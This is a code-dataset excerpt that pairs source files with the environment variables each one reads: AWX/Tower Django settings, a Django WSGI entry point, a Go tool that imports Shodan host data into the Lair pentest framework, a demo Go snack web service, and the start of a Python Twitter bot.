PRIMARY_GALAXY_USERNAME = ''
PRIMARY_GALAXY_TOKEN = ''
PRIMARY_GALAXY_PASSWORD = ''
PRIMARY_GALAXY_AUTH_URL = ''
# Settings for the public galaxy server(s).
PUBLIC_GALAXY_ENABLED = True
PUBLIC_GALAXY_SERVER = {
'id': 'galaxy',
'url': 'https://galaxy.ansible.com'
}
# Applies to any galaxy server
GALAXY_IGNORE_CERTS = False
# List of dicts of fallback (additional) Galaxy servers. If configured, these
# will be higher precedence than public Galaxy, but lower than primary Galaxy.
# Available options: 'id', 'url', 'username', 'password', 'token', 'auth_url'
FALLBACK_GALAXY_SERVERS = []
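# Illustrative example only (all values below are placeholders, not defaults):
# FALLBACK_GALAXY_SERVERS = [
#     {'id': 'fallback', 'url': 'https://galaxy.example.com/',
#      'username': '', 'password': '', 'token': '', 'auth_url': ''},
# ]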
# Enable bubblewrap support for running jobs (playbook runs only).
# Note: This setting may be overridden by database settings.
AWX_PROOT_ENABLED = True
# Command/path to bubblewrap.
AWX_PROOT_CMD = 'bwrap'
# Additional paths to hide from jobs using bubblewrap.
# Note: This setting may be overridden by database settings.
AWX_PROOT_HIDE_PATHS = []
# Additional paths to show for jobs using bubblewrap.
# Note: This setting may be overridden by database settings.
AWX_PROOT_SHOW_PATHS = []
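# Illustrative example only (the path is a placeholder, not a default):
# AWX_PROOT_SHOW_PATHS = ['/var/lib/awx/projects/']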
# The directory in which Tower will create new temporary directories for job
# execution and isolation (such as credential files and custom
# inventory scripts).
# Note: This setting may be overridden by database settings.
AWX_PROOT_BASE_PATH = "/tmp"
# Disable resource profiling by default
AWX_RESOURCE_PROFILING_ENABLED = False
# Interval (in seconds) between polls for cpu usage
AWX_RESOURCE_PROFILING_CPU_POLL_INTERVAL = '0.25'
# Interval (in seconds) between polls for memory usage
AWX_RESOURCE_PROFILING_MEMORY_POLL_INTERVAL = '0.25'
# Interval (in seconds) between polls for PID count
AWX_RESOURCE_PROFILING_PID_POLL_INTERVAL = '0.25'
# User definable ansible callback plugins
# Note: This setting may be overridden by database settings.
AWX_ANSIBLE_CALLBACK_PLUGINS = ""
# Automatically remove nodes that have missed their heartbeats after some time
AWX_AUTO_DEPROVISION_INSTANCES = False
# Enable Pendo on the UI, possible values are 'off', 'anonymous', and 'detailed'
# Note: This setting may be overridden by database settings.
PENDO_TRACKING_STATE = "off"
# Enables Insights data collection for Ansible Tower.
# Note: This setting may be overridden by database settings.
INSIGHTS_TRACKING_STATE = False
# Last gather date for Analytics
AUTOMATION_ANALYTICS_LAST_GATHER = None
AUTOMATION_ANALYTICS_INTERVAL = 14400
# Default list of modules allowed for ad hoc commands.
# Note: This setting may be overridden by database settings.
AD_HOC_COMMANDS = [
'command',
'shell',
'yum',
'apt',
'apt_key',
'apt_repository',
'apt_rpm',
'service',
'group',
'user',
'mount',
'ping',
'selinux',
'setup',
'win_ping',
'win_service',
'win_updates',
'win_group',
'win_user',
]
INV_ENV_VARIABLE_BLACKLIST = ("HOME", "USER", "_", "TERM")
# ----------------
# -- Amazon EC2 --
# ----------------
# AWS does not appear to provide pretty region names via any API, so store the
# list of names here. The available region IDs will be pulled from boto.
# http://docs.aws.amazon.com/general/latest/gr/rande.html#ec2_region
EC2_REGION_NAMES = {
'us-east-1': _('US East (Northern Virginia)'),
'us-east-2': _('US East (Ohio)'),
'us-west-2': _('US West (Oregon)'),
'us-west-1': _('US West (Northern California)'),
'ca-central-1': _('Canada (Central)'),
'eu-central-1': _('EU (Frankfurt)'),
'eu-west-1': _('EU (Ireland)'),
'eu-west-2': _('EU (London)'),
'ap-southeast-1': _('Asia Pacific (Singapore)'),
'ap-southeast-2': _('Asia Pacific (Sydney)'),
'ap-northeast-1': _('Asia Pacific (Tokyo)'),
'ap-northeast-2': _('Asia Pacific (Seoul)'),
'ap-south-1': _('Asia Pacific (Mumbai)'),
'sa-east-1': _('South America (Sao Paulo)'),
'us-gov-west-1': _('US West (GovCloud)'),
'cn-north-1': _('China (Beijing)'),
}
EC2_REGIONS_BLACKLIST = [
'us-gov-west-1',
'cn-north-1',
]
# Inventory variable name/values for determining if host is active/enabled.
EC2_ENABLED_VAR = 'ec2_state'
EC2_ENABLED_VALUE = 'running'
# Inventory variable name containing unique instance ID.
EC2_INSTANCE_ID_VAR = 'ec2_id'
# Filter for allowed group/host names when importing inventory from EC2.
EC2_GROUP_FILTER = r'^.+$'
EC2_HOST_FILTER = r'^.+$'
EC2_EXCLUDE_EMPTY_GROUPS = True
# ------------
# -- VMware --
# ------------
VMWARE_REGIONS_BLACKLIST = []
# Inventory variable name/values for determining whether a host is
# active in vSphere.
VMWARE_ENABLED_VAR = 'guest.gueststate'
VMWARE_ENABLED_VALUE = 'running'
# Inventory variable name containing the unique instance ID.
VMWARE_INSTANCE_ID_VAR = 'config.instanceuuid'
# Filter for allowed group and host names when importing inventory
# from VMware.
VMWARE_GROUP_FILTER = r'^.+$'
VMWARE_HOST_FILTER = r'^.+$'
VMWARE_EXCLUDE_EMPTY_GROUPS = True
VMWARE_VALIDATE_CERTS = False
# ---------------------------
# -- Google Compute Engine --
# ---------------------------
# It's not possible to get zones in GCE without authenticating, so we
# provide a list here.
# Source: https://developers.google.com/compute/docs/zones
GCE_REGION_CHOICES = [
('us-east1-b', _('US East 1 (B)')),
('us-east1-c', _('US East 1 (C)')),
('us-east1-d', _('US East 1 (D)')),
('us-east4-a', _('US East 4 (A)')),
('us-east4-b', _('US East 4 (B)')),
('us-east4-c', _('US East 4 (C)')),
('us-central1-a', _('US Central (A)')),
('us-central1-b', _('US Central (B)')),
('us-central1-c', _('US Central (C)')),
('us-central1-f', _('US Central (F)')),
('us-west1-a', _('US West (A)')),
('us-west1-b', _('US West (B)')),
('us-west1-c', _('US West (C)')),
('europe-west1-b', _('Europe West 1 (B)')),
('europe-west1-c', _('Europe West 1 (C)')),
('europe-west1-d', _('Europe West 1 (D)')),
('europe-west2-a', _('Europe West 2 (A)')),
('europe-west2-b', _('Europe West 2 (B)')),
('europe-west2-c', _('Europe West 2 (C)')),
('asia-east1-a', _('Asia East (A)')),
('asia-east1-b', _('Asia East (B)')),
('asia-east1-c', _('Asia East (C)')),
('asia-southeast1-a', _('Asia Southeast (A)')),
('asia-southeast1-b', _('Asia Southeast (B)')),
('asia-northeast1-a', _('Asia Northeast (A)')),
('asia-northeast1-b', _('Asia Northeast (B)')),
('asia-northeast1-c', _('Asia Northeast (C)')),
('australia-southeast1-a', _('Australia Southeast (A)')),
('australia-southeast1-b', _('Australia Southeast (B)')),
('australia-southeast1-c', _('Australia Southeast (C)')),
]
GCE_REGIONS_BLACKLIST = []
# Inventory variable name/value for determining whether a host is active
# in Google Compute Engine.
GCE_ENABLED_VAR = 'status'
GCE_ENABLED_VALUE = 'running'
# Filter for allowed group and host names when importing inventory from
# Google Compute Engine.
GCE_GROUP_FILTER = r'^.+$'
GCE_HOST_FILTER = r'^.+$'
GCE_EXCLUDE_EMPTY_GROUPS = True
GCE_INSTANCE_ID_VAR = 'gce_id'
# --------------------------------------
# -- Microsoft Azure Resource Manager --
# --------------------------------------
# It's not possible to get zones in Azure without authenticating, so we
# provide a list here.
AZURE_RM_REGION_CHOICES = [
('eastus', _('US East')),
('eastus2', _('US East 2')),
('centralus', _('US Central')),
('northcentralus', _('US North Central')),
('southcentralus', _('US South Central')),
('westcentralus', _('US West Central')),
('westus', _('US West')),
('westus2', _('US West 2')),
('canadaeast', _('Canada East')),
('canadacentral', _('Canada Central')),
('brazilsouth', _('Brazil South')),
('northeurope', _('Europe North')),
('westeurope', _('Europe West')),
('ukwest', _('UK West')),
('uksouth', _('UK South')),
('eastasia', _('Asia East')),
    ('southeastasia', _('Asia Southeast')),
('australiaeast', _('Australia East')),
('australiasoutheast', _('Australia Southeast')),
('westindia', _('India West')),
('southindia', _('India South')),
('japaneast', _('Japan East')),
('japanwest', _('Japan West')),
('koreacentral', _('Korea Central')),
('koreasouth', _('Korea South')),
]
AZURE_RM_REGIONS_BLACKLIST = []
AZURE_RM_GROUP_FILTER = r'^.+$'
AZURE_RM_HOST_FILTER = r'^.+$'
AZURE_RM_ENABLED_VAR = 'powerstate'
AZURE_RM_ENABLED_VALUE = 'running'
AZURE_RM_INSTANCE_ID_VAR = 'id'
AZURE_RM_EXCLUDE_EMPTY_GROUPS = True
# ---------------------
# ----- OpenStack -----
# ---------------------
OPENSTACK_ENABLED_VAR = 'status'
OPENSTACK_ENABLED_VALUE = 'ACTIVE'
OPENSTACK_GROUP_FILTER = r'^.+$'
OPENSTACK_HOST_FILTER = r'^.+$'
OPENSTACK_EXCLUDE_EMPTY_GROUPS = True
OPENSTACK_INSTANCE_ID_VAR = 'openstack.id'
# ---------------------
# ----- oVirt4 -----
# ---------------------
RHV_ENABLED_VAR = 'status'
RHV_ENABLED_VALUE = 'up'
RHV_GROUP_FILTER = r'^.+$'
RHV_HOST_FILTER = r'^.+$'
RHV_EXCLUDE_EMPTY_GROUPS = True
RHV_INSTANCE_ID_VAR = 'id'
# ---------------------
# ----- Tower -----
# ---------------------
TOWER_ENABLED_VAR = 'remote_tower_enabled'
TOWER_ENABLED_VALUE = 'true'
TOWER_GROUP_FILTER = r'^.+$'
TOWER_HOST_FILTER = r'^.+$'
TOWER_EXCLUDE_EMPTY_GROUPS = True
TOWER_INSTANCE_ID_VAR = 'remote_tower_id'
# ---------------------
# ----- Foreman -----
# ---------------------
SATELLITE6_ENABLED_VAR = 'foreman.enabled'
SATELLITE6_ENABLED_VALUE = 'True'
SATELLITE6_GROUP_FILTER = r'^.+$'
SATELLITE6_HOST_FILTER = r'^.+$'
SATELLITE6_EXCLUDE_EMPTY_GROUPS = True
SATELLITE6_INSTANCE_ID_VAR = 'foreman.id'
# SATELLITE6_GROUP_PREFIX and SATELLITE6_GROUP_PATTERNS defined in source vars
# ---------------------
# ----- CloudForms -----
# ---------------------
CLOUDFORMS_ENABLED_VAR = 'cloudforms.power_state'
CLOUDFORMS_ENABLED_VALUE = 'on'
CLOUDFORMS_GROUP_FILTER = r'^.+$'
CLOUDFORMS_HOST_FILTER = r'^.+$'
CLOUDFORMS_EXCLUDE_EMPTY_GROUPS = True
CLOUDFORMS_INSTANCE_ID_VAR = 'cloudforms.id'
# ---------------------
# ----- Custom -----
# ---------------------
#CUSTOM_ENABLED_VAR =
#CUSTOM_ENABLED_VALUE =
CUSTOM_GROUP_FILTER = r'^.+$'
CUSTOM_HOST_FILTER = r'^.+$'
CUSTOM_EXCLUDE_EMPTY_GROUPS = False
#CUSTOM_INSTANCE_ID_VAR =
# ---------------------
# ----- SCM -----
# ---------------------
#SCM_ENABLED_VAR =
#SCM_ENABLED_VALUE =
SCM_GROUP_FILTER = r'^.+$'
SCM_HOST_FILTER = r'^.+$'
SCM_EXCLUDE_EMPTY_GROUPS = False
#SCM_INSTANCE_ID_VAR =
# ---------------------
# -- Activity Stream --
# ---------------------
# Defaults for enabling/disabling activity stream.
# Note: These settings may be overridden by database settings.
ACTIVITY_STREAM_ENABLED = True
ACTIVITY_STREAM_ENABLED_FOR_INVENTORY_SYNC = False
# Internal API URL for use by inventory scripts and callback plugin.
INTERNAL_API_URL = 'http://127.0.0.1:%s' % DEVSERVER_DEFAULT_PORT
CALLBACK_QUEUE = "callback_tasks"
SCHEDULER_QUEUE = "scheduler"
TASK_COMMAND_PORT = 6559
SOCKETIO_NOTIFICATION_PORT = 6557
SOCKETIO_LISTEN_PORT = 8080
FACT_CACHE_PORT = 6564
# Note: This setting may be overridden by database settings.
ORG_ADMINS_CAN_SEE_ALL_USERS = True
MANAGE_ORGANIZATION_AUTH = True
# Note: This setting may be overridden by database settings.
TOWER_URL_BASE = "https://towerhost"
INSIGHTS_URL_BASE = "https://example.org"
INSIGHTS_AGENT_MIME = 'application/example'
TOWER_SETTINGS_MANIFEST = {}
# Settings related to external logger configuration
LOG_AGGREGATOR_ENABLED = False
LOG_AGGREGATOR_TCP_TIMEOUT = 5
LOG_AGGREGATOR_VERIFY_CERT = True
LOG_AGGREGATOR_LEVEL = 'INFO'
# The number of retry attempts for websocket session establishment
# If you're encountering issues establishing websockets in clustered Tower,
# raising this value can help
CHANNEL_LAYER_RECEIVE_MAX_RETRY = 10
ASGI_APPLICATION = "awx.main.routing.application"
CHANNEL_LAYERS = {
"default": {
"BACKEND": "channels_redis.core.RedisChannelLayer",
"CONFIG": {
"hosts": [BROKER_URL],
"capacity": 10000,
},
},
}
# Logging configuration.
LOGGING = {
'version': 1,
'disable_existing_loggers': False,
'filters': {
'require_debug_false': {
'()': 'django.utils.log.RequireDebugFalse',
},
'require_debug_true': {
'()': 'django.utils.log.RequireDebugTrue',
},
'require_debug_true_or_test': {
'()': 'awx.main.utils.RequireDebugTrueOrTest',
},
'external_log_enabled': {
'()': 'awx.main.utils.filters.ExternalLoggerEnabled'
},
'dynamic_level_filter': {
'()': 'awx.main.utils.filters.DynamicLevelFilter'
}
},
'formatters': {
'simple': {
'format': '%(asctime)s %(levelname)-8s %(name)s %(message)s',
},
'json': {
'()': 'awx.main.utils.formatters.LogstashFormatter'
},
'timed_import': {
'()': 'awx.main.utils.formatters.TimeFormatter',
'format': '%(relativeSeconds)9.3f %(levelname)-8s %(message)s'
},
'dispatcher': {
'format': '%(asctime)s %(levelname)-8s %(name)s PID:%(process)d %(message)s',
},
},
'handlers': {
'console': {
'()': 'logging.StreamHandler',
'level': 'DEBUG',
'filters': ['require_debug_true_or_test'],
'formatter': 'simple',
},
'null': {
'class': 'logging.NullHandler',
},
'file': {
'class': 'logging.NullHandler',
'formatter': 'simple',
},
'syslog': {
'level': 'WARNING',
'filters': ['require_debug_false'],
'class': 'logging.NullHandler',
'formatter': 'simple',
},
'external_logger': {
'class': 'awx.main.utils.handlers.AWXProxyHandler',
'formatter': 'json',
'filters': ['external_log_enabled', 'dynamic_level_filter'],
},
'tower_warnings': {
# don't define a level here, it's set by settings.LOG_AGGREGATOR_LEVEL
'class': 'logging.handlers.RotatingFileHandler',
'filters': ['require_debug_false', 'dynamic_level_filter'],
'filename': os.path.join(LOG_ROOT, 'tower.log'),
'maxBytes': 1024 * 1024 * 5, # 5 MB
'backupCount': 5,
'formatter':'simple',
},
'callback_receiver': {
# don't define a level here, it's set by settings.LOG_AGGREGATOR_LEVEL
'class': 'logging.handlers.RotatingFileHandler',
'filters': ['require_debug_false', 'dynamic_level_filter'],
'filename': os.path.join(LOG_ROOT, 'callback_receiver.log'),
'maxBytes': 1024 * 1024 * 5, # 5 MB
'backupCount': 5,
'formatter':'simple',
},
'dispatcher': {
# don't define a level here, it's set by settings.LOG_AGGREGATOR_LEVEL
'class': 'logging.handlers.RotatingFileHandler',
'filters': ['require_debug_false', 'dynamic_level_filter'],
'filename': os.path.join(LOG_ROOT, 'dispatcher.log'),
'maxBytes': 1024 * 1024 * 5, # 5 MB
'backupCount': 5,
'formatter':'dispatcher',
},
'celery.beat': {
'class':'logging.StreamHandler',
'level': 'ERROR'
}, # don't log every celerybeat wakeup
'inventory_import': {
'level': 'DEBUG',
'class':'logging.StreamHandler',
'formatter': 'timed_import',
},
'task_system': {
# don't define a level here, it's set by settings.LOG_AGGREGATOR_LEVEL
'class': 'logging.handlers.RotatingFileHandler',
'filters': ['require_debug_false', 'dynamic_level_filter'],
'filename': os.path.join(LOG_ROOT, 'task_system.log'),
'maxBytes': 1024 * 1024 * 5, # 5 MB
'backupCount': 5,
'formatter':'simple',
},
'management_playbooks': {
'level': 'DEBUG',
'class':'logging.handlers.RotatingFileHandler',
'filters': ['require_debug_false'],
'filename': os.path.join(LOG_ROOT, 'management_playbooks.log'),
'maxBytes': 1024 * 1024 * 5, # 5 MB
'backupCount': 5,
'formatter':'simple',
},
'system_tracking_migrations': {
'level': 'WARNING',
'class':'logging.handlers.RotatingFileHandler',
'filters': ['require_debug_false'],
'filename': os.path.join(LOG_ROOT, 'tower_system_tracking_migrations.log'),
'maxBytes': 1024 * 1024 * 5, # 5 MB
'backupCount': 5,
'formatter':'simple',
},
'rbac_migrations': {
'level': 'WARNING',
'class':'logging.handlers.RotatingFileHandler',
'filters': ['require_debug_false'],
'filename': os.path.join(LOG_ROOT, 'tower_rbac_migrations.log'),
'maxBytes': 1024 * 1024 * 5, # 5 MB
'backupCount': 5,
'formatter':'simple',
},
},
'loggers': {
'django': {
'handlers': ['console'],
},
'django.request': {
'handlers': ['console', 'file', 'tower_warnings'],
'level': 'WARNING',
},
'celery': { # for celerybeat connection warnings
'handlers': ['console', 'file', 'tower_warnings'],
'level': 'WARNING',
},
'rest_framework.request': {
'handlers': ['console', 'file', 'tower_warnings'],
'level': 'WARNING',
'propagate': False,
},
'py.warnings': {
'handlers': ['console'],
},
'awx': {
'handlers': ['console', 'file', 'tower_warnings', 'external_logger'],
'level': 'DEBUG',
},
'awx.conf': {
'handlers': ['null'],
'level': 'WARNING',
},
'awx.conf.settings': {
'handlers': ['null'],
'level': 'WARNING',
},
'awx.main': {
'handlers': ['null']
},
'awx.main.commands.run_callback_receiver': {
'handlers': ['callback_receiver'], # level handled by dynamic_level_filter
},
'awx.main.dispatch': {
'handlers': ['dispatcher'],
},
'awx.isolated.manager.playbooks': {
'handlers': ['management_playbooks'],
'propagate': False
},
'awx.main.commands.inventory_import': {
'handlers': ['inventory_import'],
'propagate': False
},
'awx.main.tasks': {
'handlers': ['task_system', 'external_logger'],
'propagate': False
},
'awx.main.scheduler': {
'handlers': ['task_system', 'external_logger'],
'propagate': False
},
'awx.main.access': {
'level': 'INFO', # very verbose debug-level logs
},
'awx.main.signals': {
'level': 'INFO', # very verbose debug-level logs
},
'awx.api.permissions': {
'level': 'INFO', # very verbose debug-level logs
},
'awx.analytics': {
'handlers': ['external_logger'],
'level': 'INFO',
'propagate': False
},
'django_auth_ldap': {
'handlers': ['console', 'file', 'tower_warnings'],
'level': 'DEBUG',
},
'social': {
'handlers': ['console', 'file', 'tower_warnings'],
'level': 'DEBUG',
},
'system_tracking_migrations': {
'handlers': ['console', 'file', 'tower_warnings'],
'level': 'DEBUG',
},
'rbac_migrations': {
'handlers': ['console', 'file', 'tower_warnings'],
'level': 'DEBUG',
},
}
}
LOG_AGGREGATOR_AUDIT = False
# Apply coloring to messages logged to the console
COLOR_LOGS = False
# https://github.com/django-polymorphic/django-polymorphic/issues/195
# FIXME: Disabling models.E006 warning until we can rename Project and InventorySource
SILENCED_SYSTEM_CHECKS = ['models.E006']
# Use middleware to get request statistics
AWX_REQUEST_PROFILE = False
#
# Optionally, AWX can generate DOT graphs
# (http://www.graphviz.org/doc/info/lang.html) for per-request profiling
# via gprof2dot (https://github.com/jrfonseca/gprof2dot)
#
# If you set this to True, you must `/var/lib/awx/venv/awx/bin/pip install gprof2dot`
# .dot files will be saved in `/var/log/tower/profile/` and can be converted e.g.,
#
# ~ yum install graphviz
# ~ dot -o profile.png -Tpng /var/log/tower/profile/some-profile-data.dot
#
AWX_REQUEST_PROFILE_WITH_DOT = False
# Allow profiling callback workers via SIGUSR1
AWX_CALLBACK_PROFILE = False
# Delete temporary directories created to store playbook run-time
AWX_CLEANUP_PATHS = True
MIDDLEWARE = [
'awx.main.middleware.TimingMiddleware',
'django.contrib.sessions.middleware.SessionMiddleware',
'awx.main.middleware.MigrationRanCheckMiddleware',
'corsheaders.middleware.CorsMiddleware',
'django.middleware.locale.LocaleMiddleware',
'django.middleware.common.CommonMiddleware',
'django.middleware.csrf.CsrfViewMiddleware',
'django.contrib.auth.middleware.AuthenticationMiddleware',
'django.contrib.messages.middleware.MessageMiddleware',
'awx.sso.middleware.SocialAuthMiddleware',
'crum.CurrentRequestUserMiddleware',
'awx.main.middleware.URLModificationMiddleware',
'awx.main.middleware.SessionTimeoutMiddleware',
]
# Secret header value exchanged by the websockets responsible for distributing websocket messages.
# It needs to be kept secret and randomly generated.
BROADCAST_WEBSOCKET_SECRET = ''
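# A value can be generated out-of-band, e.g. (illustrative only):
#   python -c "import secrets; print(secrets.token_urlsafe(32))"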
# Port for broadcast websockets to connect to
# Note that the clients will follow redirect responses
BROADCAST_WEBSOCKET_PORT = 443
# Whether or not broadcast websockets should check nginx certs when interconnecting
BROADCAST_WEBSOCKET_VERIFY_CERT = False
# Connect to other AWX nodes using http or https
BROADCAST_WEBSOCKET_PROTOCOL = 'https'
# All websockets that connect to the broadcast websocket endpoint will be put into this group
BROADCAST_WEBSOCKET_GROUP_NAME = 'broadcast-group_send'
# Time to wait before retrying a connection to a websocket broadcast tower node
BROADCAST_WEBSOCKET_RECONNECT_RETRY_RATE_SECONDS = 5
# How often websocket process will look for changes in the Instance table
BROADCAST_WEBSOCKET_NEW_INSTANCE_POLL_RATE_SECONDS = 10
# How often websocket process will generate stats
BROADCAST_WEBSOCKET_STATS_POLL_RATE_SECONDS = 5
| []
| []
| []
| [] | [] | python | 0 | 0 | |
Learning/wsgi.py | """
WSGI config for Learning project.
It exposes the WSGI callable as a module-level variable named ``application``.
For more information on this file, see
https://docs.djangoproject.com/en/1.11/howto/deployment/wsgi/
"""
import os
from django.core.wsgi import get_wsgi_application
os.environ.setdefault("DJANGO_SETTINGS_MODULE", "Learning.settings")
application = get_wsgi_application()
| []
| []
| []
| [] | [] | python | 0 | 0 | |
main.go | package main
import (
"bufio"
"encoding/json"
"flag"
"fmt"
"io/ioutil"
"log"
"net"
"net/url"
"os"
"strconv"
"strings"
"sync"
"time"
"github.com/lair-framework/api-server/client"
"github.com/lair-framework/go-lair"
"github.com/tomsteele/go-shodan"
)
const (
version = "1.0.2"
tool = "shodan"
osWeight = 50
usage = `
Provided a newline delimited file containing cidr netblocks or ip
addresses, this drone uses shodan's 'net' and 'host' search operators to identify and import available
services into lair. Requests are made to shodan concurrently using a pool of 10 goroutines.
Usage:
drone-shodan [options] <id> <filename>
export LAIR_ID=<id>; drone-shodan [options] <filename>
Options:
-v show version and exit
-h show usage and exit
-k allow insecure SSL connections
-force-ports disable data protection in the API server for excessive ports
-tags a comma separated list of tags to add to every host that is imported
`
)
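// Illustrative invocation (all values below are placeholders): the Lair URL must embed
// credentials and SHODAN_KEY must be exported, e.g.
//   export LAIR_API_SERVER=https://user:pass@lair.example.com:11013
//   export SHODAN_KEY=0123456789abcdef
//   drone-shodan <lair-project-id> scope.txt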
func removeDuplicates(in []string) []string {
m := map[string]bool{}
out := []string{}
for _, i := range in {
if i == "" {
continue
}
if _, ok := m[i]; ok {
continue
}
m[i] = true
out = append(out, i)
}
return out
}
func shodanIPsFromShodanNetSearch(client *shodan.Client, netblock string) ([]string, error) {
ips := []string{}
result, err := client.HostSearch("net:"+netblock, []string{}, url.Values{})
if err != nil {
return ips, err
}
for _, m := range result.Matches {
ips = append(ips, m.IPStr)
}
return ips, nil
}
func gatherIPsToSearch(sclient *shodan.Client, filename string) ([]string, error) {
ips := []string{}
cidrs := []string{}
file, err := os.Open(filename)
if err != nil {
log.Fatalf("Fatal: Could not open file. Error %s", err.Error())
}
defer file.Close()
scanner := bufio.NewScanner(file)
for scanner.Scan() {
line := scanner.Text()
_, _, err := net.ParseCIDR(line)
if err != nil {
ip := net.ParseIP(line)
if ip == nil {
log.Fatalf("Fatal: %s in file is not an ip or cidr netblock", ip)
}
ips = append(ips, line)
} else {
cidrs = append(cidrs, line)
}
}
if len(cidrs) > 0 {
lk := sync.Mutex{}
wg := sync.WaitGroup{}
wg.Add(10)
cidrsChan := make(chan string, 10)
for i := 0; i < 10; i++ {
go func(s shodan.Client) {
for cidr := range cidrsChan {
hostCount, err := s.HostCount("net:"+cidr, []string{})
if err != nil {
log.Fatalf("Fatal: Error returned from shodan. Error %s", err.Error())
}
time.Sleep(5*time.Second)
if hostCount.Total > 0 {
if netIPs, err := shodanIPsFromShodanNetSearch(sclient, cidr); err != nil {
log.Fatalf("Fatal: Error returned from shodan. Error %s", err.Error())
} else {
lk.Lock()
ips = append(ips, netIPs...)
lk.Unlock()
}
time.Sleep(5*time.Second)
}
}
wg.Done()
}(*sclient)
}
for _, cidr := range cidrs {
cidrsChan <- cidr
}
close(cidrsChan)
wg.Wait()
}
return ips, nil
}
func main() {
showVersion := flag.Bool("v", false, "")
insecureSSL := flag.Bool("k", false, "")
forcePorts := flag.Bool("force-ports", false, "")
tags := flag.String("tags", "", "")
flag.Usage = func() {
fmt.Println(usage)
}
flag.Parse()
if *showVersion {
log.Println(version)
os.Exit(0)
}
lairURL := os.Getenv("LAIR_API_SERVER")
if lairURL == "" {
log.Fatal("Fatal: Missing LAIR_API_SERVER environment variable")
}
lairPID := os.Getenv("LAIR_ID")
var filename string
switch len(flag.Args()) {
case 2:
lairPID = flag.Arg(0)
filename = flag.Arg(1)
case 1:
filename = flag.Arg(0)
default:
log.Fatal("Fatal: Missing required argument")
}
if lairPID == "" {
log.Fatal("Fatal: Missing LAIR_ID")
}
u, err := url.Parse(lairURL)
if err != nil {
log.Fatalf("Fatal: Error parsing LAIR_API_SERVER URL. Error %s", err.Error())
}
if u.User == nil {
log.Fatal("Fatal: Missing username and/or password")
}
user := u.User.Username()
pass, _ := u.User.Password()
if user == "" || pass == "" {
log.Fatal("Fatal: Missing username and/or password")
}
c, err := client.New(&client.COptions{
User: user,
Password: pass,
Host: u.Host,
Scheme: u.Scheme,
InsecureSkipVerify: *insecureSSL,
})
if err != nil {
log.Fatalf("Fatal: Error setting up client: Error %s", err.Error())
}
hostTags := []string{}
if *tags != "" {
hostTags = strings.Split(*tags, ",")
}
l := lair.Project{
ID: lairPID,
Tool: tool,
Commands: []lair.Command{lair.Command{
Tool: tool,
Command: "",
}},
}
shodanKey := os.Getenv("SHODAN_KEY")
if shodanKey == "" {
log.Fatal("Fatal: Missing SHODAN_KEY environment variable")
}
sclient := shodan.New(shodanKey)
serviceMap, err := sclient.Services()
if err != nil {
log.Fatalf("Fatal: Error getting services from shodan. Error %s", err.Error())
}
ips := []string{}
ips, err = gatherIPsToSearch(sclient, filename)
if err != nil {
log.Fatalf("Fatal: Can't gather IPs from file %s: error %s", filename, err.Error())
}
lk := sync.Mutex{}
wg := sync.WaitGroup{}
wg.Add(10)
ipChan := make(chan string, 10)
for i := 0; i < 10; i++ {
go func(s shodan.Client) {
for ip := range ipChan {
time.Sleep(10*time.Second)
host, err := s.Host(ip, url.Values{})
if err != nil {
log.Printf("Error: Error returned from shodan for %s. Error %s", ip, err.Error())
continue
}
h := lair.Host{
Hostnames: host.Hostnames,
IPv4: ip,
LastModifiedBy: tool,
Tags: hostTags,
}
for _, d := range host.Data {
service := lair.Service{
Port: d.Port,
Protocol: "tcp",
Service: serviceMap[strconv.Itoa(d.Port)],
Product: d.Product,
Notes: []lair.Note{lair.Note{
Title: "Shodan Banner",
Content: d.Data,
LastModifiedBy: tool,
}},
}
if fingerprint, ok := d.Os.(string); ok {
h.OS = lair.OS{
Fingerprint: fingerprint,
Weight: osWeight,
Tool: tool,
}
}
h.Hostnames = removeDuplicates(append(h.Hostnames, d.Hostnames...))
h.Services = append(h.Services, service)
}
lk.Lock()
l.Hosts = append(l.Hosts, h)
lk.Unlock()
}
wg.Done()
}(*sclient)
}
for _, ip := range ips {
ipChan <- ip
}
close(ipChan)
wg.Wait()
res, err := c.ImportProject(&client.DOptions{ForcePorts: *forcePorts}, &l)
if err != nil {
log.Fatalf("Fatal: Unable to import project. Error %s", err)
}
defer res.Body.Close()
droneRes := &client.Response{}
body, err := ioutil.ReadAll(res.Body)
if err != nil {
log.Fatalf("Fatal: Error %s", err.Error())
}
if err := json.Unmarshal(body, droneRes); err != nil {
log.Fatalf("Fatal: Could not unmarshal JSON. Error %s", err.Error())
}
if droneRes.Status == "Error" {
log.Fatalf("Fatal: Import failed. Error %s", droneRes.Message)
}
log.Println("Success: Operation completed successfully")
}
| [
"\"LAIR_API_SERVER\"",
"\"LAIR_ID\"",
"\"SHODAN_KEY\""
]
| []
| [
"LAIR_ID",
"LAIR_API_SERVER",
"SHODAN_KEY"
]
| [] | ["LAIR_ID", "LAIR_API_SERVER", "SHODAN_KEY"] | go | 3 | 0 | |
snack/main.go | package main
import (
"fmt"
"html/template"
"log"
"math/rand"
"net/http"
"os"
"path/filepath"
"time"
)
func main() {
// The next line creates an error on startup; uncomment it to cause a CrashLoopBackOff
// log.Fatal("Can't Find Necessary Resource File; dying")
http.HandleFunc("/", func(w http.ResponseWriter, r *http.Request) {
// The next line creates an error on request time; uncomment it to cause an error on request.
// log.Fatal("NullPointerError trying to service a request")
snacks := [...]string{
"Spam Musubi",
"Pocky Sticks",
"Kasugai Gummy",
"Green Tea Mochi",
"Shrimp-flavored Chips",
"Red Bean Rice Cake",
"Pretz Sticks",
"Peaches in Agar Jelly",
}
rand.Seed(time.Now().Unix())
s := snacks[rand.Intn(len(snacks))]
t, err := template.ParseFiles(templatePath("index.tpl"))
if err != nil {
w.WriteHeader(http.StatusInternalServerError)
fmt.Fprintf(w, "error parsing template: %v\n", err)
return
}
err = t.Execute(w, s)
if err != nil {
w.WriteHeader(http.StatusInternalServerError)
fmt.Fprintf(w, "error executing template: %v\n", err)
return
}
})
log.Println("Starting Snack Service on :8083")
log.Fatal(http.ListenAndServe(":8083", nil))
}
func templatePath(f string) string {
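	// Illustrative: with TEMPLATE_DIR=/app/templates and f="index.tpl" this returns "/app/templates/index.tpl".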
dir := os.Getenv("TEMPLATE_DIR")
return filepath.Join(dir, f)
}
| [
"\"TEMPLATE_DIR\""
]
| []
| [
"TEMPLATE_DIR"
]
| [] | ["TEMPLATE_DIR"] | go | 1 | 0 | |
main.py | import tweepy
import math
from PIL import Image
import urllib.request
import random
import glob
import os
import math
auth = tweepy.OAuthHandler(os.environ["CONSUMER_KEY"], os.environ["CONSUMER_SECRET"])
auth.set_access_token(os.environ["ACCESS_TOKEN"],os.environ["ACCESS_TOKEN_SECRET"])
api = tweepy.API(auth)
max_tweets_check_limit = 3000
